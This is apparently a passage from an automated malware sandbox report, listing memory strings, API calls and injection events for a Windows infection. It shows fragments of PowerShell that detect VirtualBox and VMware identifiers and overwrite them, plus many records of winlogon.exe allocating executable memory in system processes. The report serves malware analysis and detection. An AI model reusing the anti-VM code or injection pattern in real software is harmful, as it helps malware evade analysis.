        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
        Source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: DisableGuestVmNetworkConnectivity
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: lsass.exe, 0000000E.00000002.2731503287.0000019AB844E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMWare
        Source: svchost.exe, 00000020.00000000.1689078082.00000237FDA02000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
        Source: lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
        Source: winlogon.exe, 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: EnableGuestVmNetworkConnectivity
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA0DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000001D54FA0DD1C
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA012DC RegQueryInfoKeyW,GetProcessHeap,HeapAlloc,RegEnumValueW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,GetProcessHeap,HeapAlloc,StrCpyW,GetProcessHeap,HeapFree,3_2_000001D54FA012DC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\winlogon.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA0DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000001D54FA0DD1C
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA09490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000001D54FA09490
        Source: C:\Windows\System32\cmd.exe | Code function: 3_2_000001D54FA097F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000001D54FA097F4
        Source: C:\Windows\System32\conhost.exe | Code function: 4_2_00000281B7BCDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000281B7BCDD1C
        Source: C:\Windows\System32\conhost.exe | Code function: 4_2_00000281B7BC9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000281B7BC9490
        Source: C:\Windows\System32\conhost.exe | Code function: 4_2_00000281B7BC97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00000281B7BC97F4
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D199490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001F66D199490
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D19DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_000001F66D19DD1C
        Source: C:\Windows\System32\more.com | Code function: 9_2_000001F66D1997F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_000001F66D1997F4
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB93797F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0000019AB93797F4
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB9379490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000019AB9379490
        Source: C:\Windows\System32\lsass.exe | Code function: 14_2_0000019AB937DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000019AB937DD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000001A53EDA97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001A53EDA97F4
        Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000001A53EDA9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001A53EDA9490
        Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000001A53EDADD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001A53EDADD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000027D8F4CDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000027D8F4CDD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000027D8F4C97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0000027D8F4C97F4
        Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000027D8F4C9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000027D8F4C9490
        Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000001AD09EADD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000001AD09EADD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000001AD09EA9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000001AD09EA9490
        Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000001AD09EA97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_000001AD09EA97F4
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_0000020EC0139490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000020EC0139490
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_0000020EC013DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0000020EC013DD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_0000020EC01397F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0000020EC01397F4
        Source: C:\Windows\System32\svchost.exe | Code function: 20_2_00000229EA6A97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00000229EA6A97F4
        Source: C:\Windows\System32\svchost.exe | Code function: 20_2_00000229EA6A9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00000229EA6A9490
        Source: C:\Windows\System32\svchost.exe | Code function: 20_2_00000229EA6ADD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00000229EA6ADD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001777BDCDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001777BDCDD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001777BDC9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001777BDC9490
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001777BDC97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000001777BDC97F4
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000001590E6B9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001590E6B9490
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000001590E6BDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001590E6BDD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000001590E6B97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000001590E6B97F4
        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000021C29A69490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000021C29A69490
        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000021C29A697F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0000021C29A697F4
        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000021C29A6DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000021C29A6DD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_00000276D72CDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000276D72CDD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_00000276D72C97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00000276D72C97F4
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_00000276D72C9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000276D72C9490
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000021D846C97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_0000021D846C97F4
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000021D846C9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000021D846C9490
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000021D846CDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0000021D846CDD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_0000025BFDA99490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_0000025BFDA99490
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_0000025BFDA997F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_0000025BFDA997F4
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_0000025BFDA9DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_0000025BFDA9DD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 27_2_0000016914569490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0000016914569490
        Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000001691456DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_000001691456DD1C
        Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00000169145697F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00000169145697F4

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match | File source: amsi64_8748.amsi.csv, type: OTHER
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\lsass.exe base: 19AB9340000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1A53E9B0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 2382E970000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 27D8F490000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1AD09E70000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 20EBF9D0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 229EA670000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1777BD90000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 1590E680000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 21C29A30000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 276D7290000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 21D84690000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 25BFDA60000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 16914530000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 227D2790000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 131E07D0000 protect: page execute and read and write
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13EB1F30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27714AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 237FE190000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C5FFB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B9EE140000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B6D8940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26099880000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 267E87C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 223D5150000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 272401A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24AD0130000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2565A3D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184F43B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A196F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21502F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C8729B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 233591B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21DDF750000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10E069A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 23F7E630000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 230BDE80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ED12670000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 120CB340000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 297251A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C84E940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\sihost.exe base: 22ABD090000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 299C2130000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A4D1190000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 280593C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28CCBE80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253D40E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 156E8510000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20B71940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\explorer.exe base: 8C80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C55E370000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 192BE930000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 12EBA690000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 207A8900000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2E7C2740000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2393C930000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1A313AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2D010620000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22F16090000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 17740F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1555CAF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EE9B270000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\SystemSettingsBroker.exe base: 198AF3F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 29660B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25549A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 216C6E70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253DE550000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 261FF3A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1C5D53F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1A2AB790000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 580000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\conhost.exe base: 20BBD290000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1245E2D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 210015E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BFC2D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1ACAD650000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 16740980000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 202E3B50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23CC1780000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253E67B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26E0D650000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E10000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 610000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2CF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E00000 protect: page execute and read and writeJump to behavior
